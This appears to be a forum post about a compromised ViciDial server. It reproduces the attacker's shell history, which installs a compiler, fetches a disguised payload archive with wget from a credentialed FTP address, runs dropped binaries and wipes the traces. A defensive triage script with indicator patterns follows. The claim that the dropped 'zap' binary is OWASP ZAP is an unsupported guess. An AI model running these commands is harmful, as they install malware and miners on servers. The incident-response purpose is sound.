This is the server I had:
VERSION: 2.14-708a
BUILD: 190414-0924
© 2019 ViciDial Group
Asterisk: 11.25.3-vici
SVN:3093
Version: 2.14b0.5
SVN Version: 3093
DB Schema Version: 1569
DB Schema Update Date: 2019-04-22 17:36:10
So far, here is the information I have gathered.
The attack works on a dated version of Apache; I found this recent update for openSUSE.
https://lwn.net/Articles/785668/
The commands used in the attack are:
cd /var/wwhmtl
331 cd /var/www/html
332 ls
333 cd /src/www/htdocs
334 locate httpd.conf
335 cat /etc/apache2/httpd.conf | grep DocumentRoot
336 zypper install -y libz.so.1 binutils gcc make gcc-c++
337 wget ftp://alias:password@90.181.191.230:/osdf.pdf
338 tar xvfz osdf.pdf
339 cd back
340 cp libcrypto.so.6 /usr/lib
341 ./zap
342 ./scp
343 ./inst
344 cd ..;rm -rf osdf.pdf; rm -rf back ;
345 cat /proc/cpuinfo| grep "processor"| wc -l
Zap is a service used to find more exploits in a system.
https://www.owasp.org/index.php/OWASP_Z ... xy_Project
You will notice all crontab entries are gone.
If you do a netstat -alnp, one IP you may see is 5.196.58.15, which leads to a crypto mining site.
It would appear the goal is to turn your servers into crypto miners and more. Resolution: burn it down and rebuild, update, and have a stronger firewall.
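As an added triage example (not code from the post or from the ViciDial project), the following POSIX sh script checks captured evidence for the three indicators described above: a socket to 5.196.58.15, attacker history lines matching the steps listed in the post, and a wiped crontab. The sample netstat, history and crontab text embedded in it is constructed for the demo; the function names, the port and the PIDs are assumptions.

```shell
#!/bin/sh
# Added triage helper for the indicators described in the post above. All
# sample inputs below are constructed for the demo, not real captures; on a
# suspect host feed it the real netstat -alnp, shell history and crontab -l.

MINER_IP="5.196.58.15"   # destination the poster saw in netstat -alnp

# Attacker steps from the post, as one alternation: payload fetched over FTP
# with embedded credentials, a ".pdf" that is really a tarball, a compiler
# toolchain pulled in with zypper, and the cleanup of the dropped archive.
HISTORY_RE='wget ftp://[^ ]*@|tar xvfz [^ ]*\.pdf|zypper install .*gcc|rm -rf .*osdf\.pdf'

# Print sockets whose foreign address is the miner IP. Exit 0 if any, 1 if none.
miner_connections() {
    printf '%s\n' "$1" | grep -F " ${MINER_IP}:"
}

# Print history lines that match the attacker pattern; count them separately.
flag_history() {
    printf '%s\n' "$1" | grep -E "$HISTORY_RE"
}
count_history_hits() {
    flag_history "$1" | wc -l | tr -d ' '
}

# Number of live (non-comment, non-blank) crontab lines. A ViciDial box with
# zero entries matches the "all crontab entries are gone" symptom.
cron_entries() {
    printf '%s\n' "$1" | grep -Ev '^[[:space:]]*(#|$)' | wc -l | tr -d ' '
}

# --- constructed samples (port, PIDs and local address are made up) ---
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 10.0.0.5:48812    5.196.58.15:3333    ESTABLISHED 2841/zap
tcp        0      0 0.0.0.0:22        0.0.0.0:*           LISTEN      913/sshd'
SAMPLE_HISTORY='cd /var/www/html
ls
zypper install -y libz.so.1 binutils gcc make gcc-c++
wget ftp://alias:password@90.181.191.230:/osdf.pdf
tar xvfz osdf.pdf
cd ..;rm -rf osdf.pdf; rm -rf back ;'
SAMPLE_CRONTAB='# crontab -l on the compromised host: nothing left'

echo "miner sockets:"; miner_connections "$SAMPLE_NETSTAT" || echo "  none"
echo "history hits: $(count_history_hits "$SAMPLE_HISTORY")"; flag_history "$SAMPLE_HISTORY"
echo "live cron entries: $(cron_entries "$SAMPLE_CRONTAB")"
```

On a live host, replace the three samples with `$(netstat -alnp 2>/dev/null)`, `$(cat /root/.bash_history)` and `$(crontab -l 2>/dev/null)`.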